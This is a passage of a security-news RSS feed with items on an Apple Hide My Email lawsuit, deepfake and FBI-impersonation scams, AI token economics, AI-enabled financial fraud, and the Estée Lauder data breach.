<h3 aria-level="2"><b><span data-contrast="none">Lawsuit Seeks Damages and Changes From Apple</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Anthony Alvarez is seeking reimbursement for iCloud+ subscription fees and other alleged financial losses. The lawsuit requests an injunction requiring Apple to either provide the privacy protection promised through Hide My Email or clearly disclose any limitations.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">The complaint includes claims involving California’s Unfair Competition Law, False Advertising Law and Consumers Legal Remedies Act, along with allegations of <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/fraud/" target="_blank" rel="noopener" title="fraud" data-wpil-keyword-link="linked" data-wpil-monitor-id="29070">fraud</a>, negligent misrepresentation, breach of contract, breach of implied warranty and unjust enrichment.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">The lawsuit argues customers paid for Apple’s privacy protections in multiple ways, including iCloud+ subscription fees and premium prices associated with Apple devices marketed as offering stronger <a href="https://thecyberexpress.com/ring-camera-doorbells-privacy-security-cameras/" target="_blank" rel="noopener">privacy features</a>. Apple has stated that the July 3, 2026 patch resolved the Hide My Email issue.</span><span data-ccp-props="{}"> </span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Do more with AWS WAF labels using dynamic label interpolation]]></title>
<description><![CDATA[AWS WAF classifies web traffic by attaching metadata to each request it evaluates. Managed rule groups such as AWS WAF Bot Control and AWS WAF Fraud Control account takeover prevention (ATP) attach labels that describe what they found. A label…
Read more →
The post Do more with AWS WAF labels usi...]]></description>
<link>https://tsecurity.de/de/3684489/it-security-nachrichten/do-more-with-aws-waf-labels-using-dynamic-label-interpolation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684489/it-security-nachrichten/do-more-with-aws-waf-labels-using-dynamic-label-interpolation/</guid>
<pubDate>Tue, 21 Jul 2026 19:45:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>AWS WAF classifies web traffic by attaching metadata to each request it evaluates. Managed rule groups such as AWS WAF Bot Control and AWS WAF Fraud Control account takeover prevention (ATP) attach labels that describe what they found. A label…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/do-more-with-aws-waf-labels-using-dynamic-label-interpolation/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/do-more-with-aws-waf-labels-using-dynamic-label-interpolation/">Do more with AWS WAF labels using dynamic label interpolation</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA['$3.7B lost to deepfakes' — Why social media is the perfect launchpad for AI fraud]]></title>
<description><![CDATA[From fake celebrity endorsements to phone calls, video meetings, and messaging apps, new Surfshark research finds people have lost at least $3.7 billion to deepfake fraud — and social media is the single biggest origin point. Here's how to stay safe.]]></description>
<link>https://tsecurity.de/de/3684329/it-nachrichten/37b-lost-to-deepfakes-why-social-media-is-the-perfect-launchpad-for-ai-fraud/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684329/it-nachrichten/37b-lost-to-deepfakes-why-social-media-is-the-perfect-launchpad-for-ai-fraud/</guid>
<pubDate>Tue, 21 Jul 2026 18:17:48 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[From fake celebrity endorsements to phone calls, video meetings, and messaging apps, new Surfshark research finds people have lost at least $3.7 billion to deepfake fraud — and social media is the single biggest origin point. Here's how to stay safe.]]></content:encoded>
</item>
<item>
<title><![CDATA[FBI Impersonation Scam Targets Previous Victims]]></title>
<description><![CDATA[The FBI’s Internet Crime Complaint Center has issued an updated warning about scammers impersonating bureau personnel to target previous fraud victims. This article has been indexed from CyberMaterial Read the original article: FBI Impersonation Scam Targets Previous Victims
Read more →
The post ...]]></description>
<link>https://tsecurity.de/de/3683820/it-security-nachrichten/fbi-impersonation-scam-targets-previous-victims/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683820/it-security-nachrichten/fbi-impersonation-scam-targets-previous-victims/</guid>
<pubDate>Tue, 21 Jul 2026 15:25:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The FBI’s Internet Crime Complaint Center has issued an updated warning about scammers impersonating bureau personnel to target previous fraud victims. This article has been indexed from CyberMaterial Read the original article: FBI Impersonation Scam Targets Previous Victims</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/fbi-impersonation-scam-targets-previous-victims/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/fbi-impersonation-scam-targets-previous-victims/">FBI Impersonation Scam Targets Previous Victims</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fake FBI Agents Use IC3 Complaint Scams to Target Fraud Victims]]></title>
<description><![CDATA[Fake FBI agents are using deepfake videos, spoofed IC3 websites and false recovery claims to steal money and personal information from people who were scammed before, the FBI warns. This article has been indexed from Hackread – Cybersecurity News, Data…
Read more →
The post Fake FBI Agents Use IC...]]></description>
<link>https://tsecurity.de/de/3683694/it-security-nachrichten/fake-fbi-agents-use-ic3-complaint-scams-to-target-fraud-victims/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683694/it-security-nachrichten/fake-fbi-agents-use-ic3-complaint-scams-to-target-fraud-victims/</guid>
<pubDate>Tue, 21 Jul 2026 14:37:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Fake FBI agents are using deepfake videos, spoofed IC3 websites and false recovery claims to steal money and personal information from people who were scammed before, the FBI warns. This article has been indexed from Hackread – Cybersecurity News, Data…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/fake-fbi-agents-use-ic3-complaint-scams-to-target-fraud-victims/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/fake-fbi-agents-use-ic3-complaint-scams-to-target-fraud-victims/">Fake FBI Agents Use IC3 Complaint Scams to Target Fraud Victims</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The token debate: What CIOs can learn from the laws of thermodynamics]]></title>
<description><![CDATA[What if the next breakthrough in Enterprise AI doesn’t come from computer science alone?



What if it comes from applying principles that physicists have understood for more than a century?



According to Gartner, rising token-driven AI spend is straining budgets and challenging cost justificat...]]></description>
<link>https://tsecurity.de/de/3683604/it-nachrichten/the-token-debate-what-cios-can-learn-from-the-laws-of-thermodynamics/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683604/it-nachrichten/the-token-debate-what-cios-can-learn-from-the-laws-of-thermodynamics/</guid>
<pubDate>Tue, 21 Jul 2026 14:03:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">What if the next breakthrough in Enterprise AI doesn’t come from computer science alone?</p>



<p class="wp-block-paragraph">What if it comes from applying principles that physicists have understood for more than a century?</p>



<p class="wp-block-paragraph">According to <a href="https://www.gartner.com/en/newsroom/press-releases/2026-06-24-gartner-predicts-ai-coding-costs-will-surpass-average-developer-salary-by-2028-as-token-consumption-surges">Gartner</a>, rising token-driven AI spend is straining budgets and challenging cost justification. As organizations race to deploy generative AI and agentic systems, token consumption dominates nearly every executive discussion: How many tokens did we use? How much did inference cost? Can we reduce our AI bill?</p>



<p class="wp-block-paragraph">These are important operational questions. But they are not the strategic questions.</p>



<p class="wp-block-paragraph">I believe the economics of enterprise AI can be viewed through the lens of three well-established principles from thermodynamics: the conservation of energy, entropy, and exergy.</p>



<p class="wp-block-paragraph">While these principles describe physical systems — not AI —they offer a useful way to think about how organizations should measure AI success.</p>



<h2 class="wp-block-heading">Principle 1: Value is created through transformation</h2>



<p class="wp-block-paragraph"><a href="https://en.wikipedia.org/wiki/Laws_of_thermodynamics#First_law">The 1<sup>st</sup> Law of Thermodynamics</a> tells us that energy cannot be created or destroyed. It can only be transformed.</p>



<p class="wp-block-paragraph">Enterprise AI presents a similar management lesson: Tokens are not valuable because they are consumed; they become valuable only when they are transformed into business outcomes: A faster loan application decision. A better customer experience. Faster and more accurate software. Reduced fraud. Higher employee productivity. A new product. A strategic insight.</p>



<p class="wp-block-paragraph">The executive question therefore is not, “How many tokens did we consume?” It is: “How much business value did those tokens create?”</p>



<p class="wp-block-paragraph">This leads to a new executive metric: return on tokens (ROT).</p>



<p class="wp-block-paragraph">Just as organizations measure return on investment, they should begin measuring the business value generated for every million AI tokens consumed.</p>



<p class="wp-block-paragraph">The organizations that win will not necessarily consume fewer tokens. They will generate more value from every token they use.</p>



<h2 class="wp-block-heading">Principle 2: Every transformation creates waste</h2>



<p class="wp-block-paragraph"><a href="https://en.wikipedia.org/wiki/Laws_of_thermodynamics#Second_law">The 2nd Law of Thermodynamics</a> teaches us that every energy transformation introduces inefficiencies.</p>



<p class="wp-block-paragraph">Some energy inevitably becomes less useful for doing work.</p>



<p class="wp-block-paragraph">The same pattern appears in enterprise AI: Not every token contributes equally to business outcomes.</p>



<p class="wp-block-paragraph">Some are spent on:</p>



<ul class="wp-block-list">
<li>Repeated prompts</li>



<li>Oversized context windows</li>



<li>Redundant reasoning</li>



<li>Hallucinations requiring correction</li>



<li>Multiple agents performing the same work</li>



<li>Expensive models solving simple problems</li>
</ul>



<p class="wp-block-paragraph">Those tokens are not “lost.” They simply produce very little business value.</p>



<p class="wp-block-paragraph">I think of this as token entropy. Every enterprise deploying AI will experience it. The goal is not to eliminate token entropy completely — that would be unrealistic. The goal is to continuously identify it, measure it and reduce it. Because every unnecessary token represents an opportunity to improve both cost and business performance.</p>



<h2 class="wp-block-heading">Principle 3: Useful work matters more than energy consumed</h2>



<p class="wp-block-paragraph">Thermodynamics introduces another important idea: <a href="https://en.wikipedia.org/wiki/Exergy">Exergy</a>.</p>



<p class="wp-block-paragraph">Unlike energy, exergy measures how much energy can actually be converted into useful work. Two systems may consume the same amount of energy while producing dramatically different results.</p>



<p class="wp-block-paragraph">The same is true for enterprise AI.</p>



<p class="wp-block-paragraph">Imagine two companies each consuming one billion tokens. One produces meeting summaries. The other transforms claims operations, accelerates software delivery, detects fraud, improves customer retention, and creates new revenue opportunities. Both consumed the same number of tokens. Only one extracted significantly more business value.</p>



<p class="wp-block-paragraph">Borrowing this concept as a management analogy, I call this token exergy.</p>



<p class="wp-block-paragraph">Token exergy represents an organization’s ability to convert AI intelligence into meaningful business outcomes:</p>



<ul class="wp-block-list">
<li>High token exergy means AI is solving important business problems.</li>



<li>Low token exergy means AI is generating activity without creating proportional enterprise value.</li>
</ul>



<p class="wp-block-paragraph">The distinction matters, because activity is not the same as impact.</p>



<h2 class="wp-block-heading">A new responsibility for CIOs</h2>



<p class="wp-block-paragraph">For years, CIOs have monitored infrastructure: Cloud costs, storage, network utilization, GPU consumption.</p>



<p class="wp-block-paragraph">These metrics remain important, but they tell only part of the story.</p>



<p class="wp-block-paragraph"><a href="https://www.cio.com/article/4184596/tokenomics-in-enterprise-ai.html?utm=hybrid_search">Token usage needs to be measured, planned, optimized and governed with the same discipline as any other cloud resource.</a> This means that the next generation of CIO dashboards should answer different questions:</p>



<ul class="wp-block-list">
<li>What is our return on tokens?</li>



<li>Where is token entropy reducing our effectiveness?</li>



<li>How much token exergy are we generating?</li>



<li>Which AI initiatives produce the greatest business value?</li>



<li>Which use cases create the strongest competitive advantage?</li>
</ul>



<p class="wp-block-paragraph">These are no longer technology metrics. They are business metrics.</p>



<p class="wp-block-paragraph">The next generation of CIOs will not simply deploy AI. They will manage an economy of intelligence.</p>



<p class="wp-block-paragraph">Their role will resemble that of a portfolio manager — allocating AI capacity where it creates the greatest enterprise value, reducing waste and continuously improving the productivity of every autonomous workflow.</p>



<p class="wp-block-paragraph">That responsibility cannot be fulfilled by dashboards alone.</p>



<p class="wp-block-paragraph">It requires an intelligent layer capable of observing, learning and optimizing the entire AI  ecosystem. <a href="https://www.cio.com/article/4157977/micro-and-macro-agents-the-emerging-architecture-of-the-agentic-enterprise.html?utm=hybrid_search">Three-layer enterprise agentic architecture</a> Will enable this.</p>



<h2 class="wp-block-heading">The next competitive advantage</h2>



<p class="wp-block-paragraph">Every major technology revolution eventually shifts from measuring inputs to measuring outcomes:</p>



<ul class="wp-block-list">
<li>Factories stopped measuring coal consumption and began measuring productivity.</li>



<li>Cloud computing evolved beyond server utilization to business agility.</li>



<li>Digital businesses measured customer acquisition costs and lifetime value.</li>
</ul>



<p class="wp-block-paragraph">Enterprise AI is approaching the same inflection point. Organizations that focus only on token costs will optimize for efficiency. Organizations that measure return on tokens, minimize token entropy and maximize token exergy will optimize for business transformation.</p>



<p class="wp-block-paragraph">That is a fundamentally different objective. And I believe it will separate AI leaders from AI followers.</p>



<p class="wp-block-paragraph">Because in the end, the future of enterprise AI will not be determined by how many tokens an organization consumes. It will be determined by how effectively those tokens are transformed into lasting business value. <a href="https://www.cio.com/article/4183263/the-ai-adoption-spree-is-over-time-to-focus-on-value.html?utm=hybrid_search">The AI adoption spending spree is over. Time to focus on value.</a></p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Shufti simplifies cross-border compliance with the Glocal Platform]]></title>
<description><![CDATA[Shufti has launched the Shufti Glocal Platform, a compliance lifecycle management solution designed to help organizations manage identity verification, fraud prevention, risk assessment, and regulatory compliance through a single platform across every industry, every region, and every use case. F...]]></description>
<link>https://tsecurity.de/de/3683565/it-security-nachrichten/shufti-simplifies-cross-border-compliance-with-the-glocal-platform/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683565/it-security-nachrichten/shufti-simplifies-cross-border-compliance-with-the-glocal-platform/</guid>
<pubDate>Tue, 21 Jul 2026 13:40:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Shufti has launched the Shufti Glocal Platform, a compliance lifecycle management solution designed to help organizations manage identity verification, fraud prevention, risk assessment, and regulatory compliance through a single platform across every industry, every region, and every use case. For…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/shufti-simplifies-cross-border-compliance-with-the-glocal-platform/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/shufti-simplifies-cross-border-compliance-with-the-glocal-platform/">Shufti simplifies cross-border compliance with the Glocal Platform</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Shufti simplifies cross-border compliance with the Glocal Platform]]></title>
<description><![CDATA[Shufti has launched the Shufti Glocal Platform, a compliance lifecycle management solution designed to help organizations manage identity verification, fraud prevention, risk assessment, and regulatory compliance through a single platform across every industry, every region, and every use case. F...]]></description>
<link>https://tsecurity.de/de/3683518/it-security-nachrichten/shufti-simplifies-cross-border-compliance-with-the-glocal-platform/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683518/it-security-nachrichten/shufti-simplifies-cross-border-compliance-with-the-glocal-platform/</guid>
<pubDate>Tue, 21 Jul 2026 13:21:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Shufti has launched the Shufti Glocal Platform, a compliance lifecycle management solution designed to help organizations manage identity verification, fraud prevention, risk assessment, and regulatory compliance through a single platform across every industry, every region, and every use case. For decades, global expansion has come with an unwritten rule: every new market needs a new compliance provider. A solution built for one region may not fully support the regulations, document ecosystems, verification methods, or risk … <a href="https://www.helpnetsecurity.com/2026/07/21/shufti-simplifies-cross-border-compliance-with-the-glocal-platform/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/21/shufti-simplifies-cross-border-compliance-with-the-glocal-platform/">Shufti simplifies cross-border compliance with the Glocal Platform</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Asymmetric warfare in financial services: AI-powered fraud demands unified command]]></title>
<description><![CDATA[Military strategists know that asymmetric wars are lost not at the point of attack but at the seams between defensive units, where no single commander owns the territory and information moves slower than the threat. In January 2024, a finance employee at Arup’s Hong Kong office learned this lesso...]]></description>
<link>https://tsecurity.de/de/3683476/it-security-nachrichten/asymmetric-warfare-in-financial-services-ai-powered-fraud-demands-unified-command/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683476/it-security-nachrichten/asymmetric-warfare-in-financial-services-ai-powered-fraud-demands-unified-command/</guid>
<pubDate>Tue, 21 Jul 2026 13:08:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Military strategists know that asymmetric wars are lost not at the point of attack but at the seams between defensive units, where no single commander owns the territory and information moves slower than the threat. In January 2024, a finance employee at Arup’s Hong Kong office learned this lesson for $25 million, joining a video call with what appeared to be the engineering firm’s chief financial officer and several colleagues, receiving instructions to wire funds to a designated account, and complying. Every face on the screen was a deepfake, cloned from publicly available footage of the actual executives. The attackers conducted the entire meeting in real time and vanished before anyone in the organization realized the CFO had never logged on.</p>



<p class="wp-block-paragraph">The incident would be remarkable enough as a one-off, but it represents a pattern accelerating well beyond isolated cases. <a href="https://nilsonreport.com/articles/card-fraud-losses-worldwide-2024/">Global payment fraud reached $33.4 billion in 2024</a> according to the Nilson Report, and the US absorbed a disproportionate 42% of those losses despite processing only 25% of global card transactions. The latest FBI Internet Crime report identifies <a href="https://www.fbi.gov/news/press-releases/cryptocurrency-and-ai-scams-bilk-americans-of-billions">more than one million complaints and nearly $21 billion in cyber-enabled crime losses in 2025</a> (up from $16 million in 2023), while Deloitte projects <a href="https://www.deloitte.com/us/en/insights/industry/financial-services/deepfake-banking-fraud-risk-on-the-rise.html">AI-enabled fraud in the US will hit $40 billion by 2027</a>. This increasingly includes crypto-related fraud, not just credit card or traditional banking fraud.</p>



<p class="wp-block-paragraph">For anyone who oversees financial operations, risk or payment technology infrastructure, these numbers are not forecasts of a future “regional conflict.” Instead, they are the current cost of a war most institutions have not yet recognized they are fighting.</p>



<h2 class="wp-block-heading"><a></a>Reconnaissance at scale: How AI redraws the attacker’s map</h2>



<p class="wp-block-paragraph">The conventional narrative around AI-powered fraud emphasizes speed: Faster phishing, faster credential stuffing, faster social engineering. Jason Kikta, CTO of<a href="https://www.automox.com/"> Automox</a>, sees the shift differently. “The main threat from AI misuse isn’t faster execution, as automation has been leveraged for years,” Kikta says. “The true dangers are lower barriers to entry and faster adaptation, giving attackers the ability to pivot techniques in near real-time.”</p>



<p class="wp-block-paragraph">The distinction means that execution is a quantitative improvement, the kind existing defenses can absorb by scaling up. Lower barriers to entry and real-time adaptation are qualitative: A force multiplier that turns every amateur into an equipped operator with a coach that learns from each failed attempt. Deepfake-as-a-service platforms now produce voice clones from three seconds of audio. AI-driven vulnerability scanning maps an institution’s unpatched endpoints while the security team is still scheduling the review meeting. In 2024, 269 million stolen credit card records appeared on dark web platforms, giving AI-equipped attackers what military intelligence analysts would call an order of battle: A detailed map of the defender’s exposed positions, ready to be mined for patterns, tested against live systems and exploited at machine speed.</p>



<p class="wp-block-paragraph">The result is a combined arms threat, one that operates across domains simultaneously the way a competent military force coordinates air, ground and intelligence rather than running them as independent campaigns. The same AI that crafts a convincing business email compromise can probe unpatched point-of-sale systems to install digital skimmers. The same synthetic identity that opens a fraudulent credit card account can exploit a payment authorization vulnerability discovered through automated scanning. Card-not-present fraud now accounts for 71% of all US card fraud losses, and the attack surface keeps expanding as digital wallets and e-commerce push more transactions into channels where physical card verification is impossible.</p>



<p class="wp-block-paragraph">Attackers treat endpoint management gaps and transaction monitoring gaps as a single attack surface, while most defenders continue to patrol them as separate territories.</p>



<h2 class="wp-block-heading"><a></a>Fragmented command: The structural vulnerability AI exploits</h2>



<p class="wp-block-paragraph">Consider how most financial institutions, crypto platforms and digital asset intermediaries actually organize their defenses: A cybersecurity team focused on identity compromise, endpoint protection and infrastructure threats; a fraud team focused on account takeover, mule networks and scam typologies; an AML or financial crimes team focused on wallet screening, sanctions exposure and suspicious activity reporting; and an AI risk or digital trust team, if one exists at all, focused on synthetic media, model abuse and impersonation. Each function has its own tooling, budget, reporting line and intelligence feeds. In crypto markets, where value can move irreversibly across wallets, chains, mixers, exchanges and OTC brokers in minutes, those silos create exploitable gaps between detection, attribution, interdiction and recovery.</p>



<p class="wp-block-paragraph">A pig-butchering scam that begins on a dating app, migrates to WhatsApp, directs a victim to a fake crypto investment platform, and then launders proceeds through nested services and cross-chain bridges is not just a fraud event. It is also a cybersecurity event, a financial crimes event, an identity event, a platform abuse event and, increasingly, an AI-enabled social engineering event. Chainalysis reported that high-yield investment scams and pig-butchering schemes were among the most successful crypto scam types in 2024, while also noting growing use of AI in fraud and scams.</p>



<p class="wp-block-paragraph">Research published by the University of California, Davis found that these schemes follow a staged lifecycle: Trust-building, fabricated investment returns, escalating deposits, withdrawal obstruction and re-targeting of victims after the initial loss. When each part of that lifecycle is monitored by a different team, the institution sees fragments of the attack rather than the economic system of the crime.</p>



<p class="wp-block-paragraph">“Fraud no longer happens in isolated channels,” observes Jeff Li, Global Product &amp; Designer Lead at Binance. “AI-powered scams move seamlessly across platforms, and payment systems, making fragmented defenses increasingly ineffective.” He believes that the future of <a href="https://www.binance.com/en/blog/security/2953911729763975700">security depends on unified intelligence</a> — combining AI, real-time monitoring, secure infrastructure and cross-functional response mechanisms into a single coordinated defense system.<br><br>“We’ve invested heavily in AI-driven risk detection, real-time scam warnings and infrastructure to stay ahead of evolving threats, continues Li, claiming that from Q1 2025 to Q1 2026, these efforts helped Binance prevent over $10 billion in potential user losses and protected more than 5 million users globally. As AI continues to reshape both fraud and fraud prevention, the focus remains on building systems that can protect users, not just at scale, but in real time.</p>



<h2 class="wp-block-heading"><a></a>Unified command: From org chart to battle plan</h2>



<p class="wp-block-paragraph">Kikta’s assessment contains a contrarian detail worth teasing apart: “The good news is that a strong compliance program prioritizing depth of coverage and speed of enforcement will hold up against AI-enabled fraud,” he says. In a landscape saturated with predictions that existing defenses are obsolete, Kikta argues that the fundamentals of patch management, endpoint hygiene and compliance rigor still hold, provided the clock speed at which those fundamentals execute keeps pace with the adversary.</p>



<p class="wp-block-paragraph">That clock speed is the operational link between cybersecurity and card fraud prevention. An unpatched point-of-sale terminal or payment gateway exposed for 30 days represents 30 days of reconnaissance opportunity for an AI scanner probing for places to install a digital skimmer or intercept card data in transit. A compliance gap in identity verification is an open invitation for synthetic identities to open accounts and run fraudulent transactions. Endpoint management data and transaction monitoring data describe the same attack surface from different angles, and fusing those streams into a single operational picture, the financial equivalent of a military intelligence fusion center, gives defenders something the current siloed structure cannot: Visibility into an attack developing across domains before it reaches the payment layer.</p>



<p class="wp-block-paragraph">The value of that convergence extends beyond defense. A unified data layer across cyber, fraud and payments creates consolidated threat intelligence that can inform underwriting decisions, merchant risk scoring and product design. Organizations that treat converged security data as a business intelligence asset (not merely an operational feed) will find they have built something with commercial utility well beyond the security operations center.</p>



<p class="wp-block-paragraph">Mascaro frames the prescription in terms that belong in a boardroom, not a SOC. “The real competitive advantage in fraud isn’t your AI stack,” he says. “It’s leadership’s clarity to unify risk disciplines that everyone else keeps in separate departments.”</p>



<h2 class="wp-block-heading"><a></a>Field manual: What winning institutions do differently</h2>



<p class="wp-block-paragraph">The institutions gaining ground in this new form of asymmetric conflict share a common operational posture: They treat endpoint management as card fraud prevention rather than IT maintenance, and they feed cyber, fraud and payments intelligence into a single picture rather than three separate briefings. The defensive AI advantage, such as it is, comes from that integration, not from any single model’s sophistication.</p>



<p class="wp-block-paragraph">Adversaries have already unified their operations. Yet, payment processors and financial institutions that keep running separate campaigns on separate fronts, with separate intelligence, will keep conducting after-action reviews of battles they have already lost.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Estée Lauder Confirms Cyberattack Affecting Personal Information]]></title>
<description><![CDATA[The Estée Lauder data breach has prompted the global cosmetics company to notify affected individuals after hackers exploited a vulnerability in Oracle E-Business Suite, a platform used for human resources (HR) operations.  

The Estée Lauder cyberattack stemmed from unauthorized access that oc...]]></description>
<link>https://tsecurity.de/de/3683174/it-security-nachrichten/este-lauder-confirms-cyberattack-affecting-personal-information/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683174/it-security-nachrichten/este-lauder-confirms-cyberattack-affecting-personal-information/</guid>
<pubDate>Tue, 21 Jul 2026 11:22:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1255" height="760" src="https://thecyberexpress.com/wp-content/uploads/Estee-Lauder-data-breach.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Estée Lauder data breach" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Estee-Lauder-data-breach.webp 1255w, https://thecyberexpress.com/wp-content/uploads/Estee-Lauder-data-breach-300x182.webp 300w, https://thecyberexpress.com/wp-content/uploads/Estee-Lauder-data-breach-1024x620.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Estee-Lauder-data-breach-768x465.webp 768w, https://thecyberexpress.com/wp-content/uploads/Estee-Lauder-data-breach-600x363.webp 600w, https://thecyberexpress.com/wp-content/uploads/Estee-Lauder-data-breach-150x91.webp 150w, https://thecyberexpress.com/wp-content/uploads/Estee-Lauder-data-breach-750x454.webp 750w, https://thecyberexpress.com/wp-content/uploads/Estee-Lauder-data-breach-1140x690.webp 1140w, https://thecyberexpress.com/wp-content/uploads/Estee-Lauder-data-breach.webp 1255w, https://thecyberexpress.com/wp-content/uploads/Estee-Lauder-data-breach-300x182.webp 300w, https://thecyberexpress.com/wp-content/uploads/Estee-Lauder-data-breach-1024x620.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Estee-Lauder-data-breach-768x465.webp 768w, https://thecyberexpress.com/wp-content/uploads/Estee-Lauder-data-breach-600x363.webp 600w, https://thecyberexpress.com/wp-content/uploads/Estee-Lauder-data-breach-150x91.webp 150w, https://thecyberexpress.com/wp-content/uploads/Estee-Lauder-data-breach-750x454.webp 750w, https://thecyberexpress.com/wp-content/uploads/Estee-Lauder-data-breach-1140x690.webp 1140w" sizes="(max-width: 1255px) 100vw, 1255px" title="Estée Lauder Confirms Cyberattack Affecting Personal Information 1"></p><span data-contrast="auto">The Estée Lauder data breach has prompted the global cosmetics company to notify affected individuals after hackers exploited a vulnerability in Oracle E-Business Suite, a platform used for human resources (HR) operations. </span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">The Estée Lauder cyberattack stemmed from unauthorized access that occurred on or around August 9, 2025, though the company said it identified the incident last month and confirmed the scope of the breach on June 19, 2026.</span><span data-ccp-props="{}"> </span>
<h3 aria-level="2"><b><span data-contrast="none">Estée Lauder Data Breach Exposed Sensitive Personal Information</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">According to the <a href="https://oag.ca.gov/system/files/ELC%20-%20U.S.%20Individual%20Notification%20Letter.pdf" target="_blank" rel="nofollow noopener">company's notification letter</a>, the attackers gained access to the Oracle E-Business Suite system and obtained personal information belonging to certain individuals.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">We became aware of a cybersecurity issue involving a <a class="wpil_keyword_link" href="https://thecyberexpress.com/firewall-daily/vulnerabilities/" title="vulnerability" data-wpil-keyword-link="linked" data-wpil-monitor-id="29047">vulnerability</a> in the Oracle E-Business Suite system which is used by the Estee Lauder Companies for HR management purposes," the notice states.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">It further adds: "On June 19, 2026, we determined through our investigation that, on or around August 9, 2025, an unauthorized third party gained access to the Oracle E-Business Suite system and obtained personal information of certain individuals."</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">The exposed <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="29050">data</a> in the incident includes full names, postal addresses, email addresses, dates of birth, Social Security numbers (SSNs), passport numbers, financial account information, including bank account numbers, health information, and employment records such as payroll and performance reports.</span><span data-ccp-props="{}"> </span>
<h3 aria-level="2"><b><span data-contrast="none">Oracle Vulnerability Tied to Estée Lauder Cyberattack</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Although Estée Lauder did not identify the specific vulnerability used in the attack, the timeline aligns with the widespread exploitation of the Oracle E-Business Suite flaw <a href="https://thecyberexpress.com/oracle-ebs-critical-flaw-cve-2025-61882/" target="_blank" rel="noopener">CVE-2025-61882</a>.</span><span data-ccp-props="{}"> </span>

